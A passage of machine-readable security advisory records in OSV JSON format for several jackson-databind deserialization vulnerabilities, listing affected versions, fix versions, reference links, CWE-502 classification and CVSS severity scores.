"https://security.netapp.com/advisory/ntap-20191017-0006" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6788e4c991f75b89d290ad06b463fcd30bcae99fee610345a35b7bc6@%3Cissues.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ec8d8d485c2c8ac55ea425f4cd96596ef37312532712639712ebcdd@%3Ccommits.iceberg.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-11-13T00:30:39Z", "nvd_published_at": "2019-10-01T17:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-fqwf-pjwf-7vqv", "published": "2020-05-15T18:59:04Z", "modified": "2024-07-03T21:22:37.578162Z", "aliases": [ "CVE-2020-10673" ], "summary": "jackson-databind mishandles the interaction between serialization gadgets and typing", "details": "FasterXML jackson-databind 2.x before 2.9.10.4 and 2.6.7.4 mishandles the interaction between serialization gadgets and typing, related to com.caucho.config.types.ResourceRef (aka caucho-quercus).", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.4" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.11.5", "2.8.11.6", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9", "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.10.2", "2.9.10.3", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-fqwf-pjwf-7vqv/GHSA-fqwf-pjwf-7vqv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-fqwf-pjwf-7vqv/GHSA-fqwf-pjwf-7vqv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-10673" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2660" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00027.html" }, { "type": "WEB", "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200403-0002" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-04-22T20:59:03Z", "nvd_published_at": "2020-03-18T22:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gjmw-vf9h-g25v", "published": "2019-11-13T00:32:38Z", "modified": "2024-03-16T05:19:37.211801Z", "aliases": [ "CVE-2019-17531" ], "summary": "jackson-databind polymorphic typing issue", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.0.0 prior to 2.9.10.1, 2.8.11.5, and 2.6.7.3. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the apache-log4j-extra (version 1.2.x) jar in the classpath, and an attacker can provide a JNDI service to access, it is possible to make the service execute a malicious payload. ", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/11/GHSA-gjmw-vf9h-g25v/GHSA-gjmw-vf9h-g25v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17531" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2498" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20191024-0005" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00013.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r392099ed2757ff2e383b10440594e914d080511d7da1c8fed0612c1f@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b3c90d38f99db546de60fea65f99a924d540fae2285f014b79606ca5@%3Ccommits.pulsar.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0445" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0164" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0161" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0160" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0159" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4192" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-11-13T00:30:58Z", "nvd_published_at": "2019-10-12T21:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gwp4-hfv6-p7hw", "published": "2019-08-01T19:18:06Z", "modified": "2024-03-13T05:27:58.436849Z", "aliases": [ "CVE-2019-14439" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2, 2.8.11.4, 2.7.9.6, and 2.6.7.3. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/08/GHSA-gwp4-hfv6-p7hw/GHSA-gwp4-hfv6-p7hw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-14439" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2389" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ad418eeb974e357f2797aef64aa0e3ffaaa6125b" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00011.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Oct/6" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190814-0001" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4542" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-08-01T15:37:50Z", "nvd_published_at": "2019-07-30T11:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gww7-p5w4-wrfv", "published": "2020-03-04T20:52:11Z", "modified": "2024-03-15T01:05:18.790961Z", "aliases": [ "CVE-2019-20330" ], "summary": "Deserialization of Untrusted Data in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.6.7.4, 2.7.x before 2.7.9.7, 2.8.x before 2.8.11.5, and 2.9.x before 2.9.10.2 lacks certain `net.sf.ehcache` blocking.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.4" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.7.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.7" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.6", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.5" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.11.4", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.10.2" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.10", "2.9.10.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9", "2.9.9.1", "2.9.9.2", "2.9.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.9.10.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/03/GHSA-gww7-p5w4-wrfv/GHSA-gww7-p5w4-wrfv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20330" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2526" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/eb254813cc822d0af015ce8fe05febf50721dc53" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/fc4214a883dc087070f25da738ef0d49c2f3387e" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r909c822409a276ba04dc2ae31179b16f6864ba02c4f9911bdffebf95@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2e572f568de8df5ba151e6aebb225a0629faaf0476bf7c7ed877af8@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra5ce96faec37c26b0aa15b4b6a8b1cbb145a748653e56ae83e9685d0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra8a80dbc7319916946397823aec0d893d24713cbf7b5aee0e957298c@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb532fed78d031fff477fd840b81946f6d1200f93a63698dae65aa528@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd1f346227e11fc515914f3a7b20d81543e51e5822ba71baa0452634a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd49cfa41bbb71ef33b53736a6af2aa8ba88c2106e30f2a34902a87d2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd6c6fef14944f3dcfb58d35f9317eb1c32a700e86c1b5231e45d3d0b@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfa57d9c2a27d3af14c69607fb1a3da00e758b2092aa88eb6a51b6e99@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200127-0004" }, { "type": "WEB", "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": 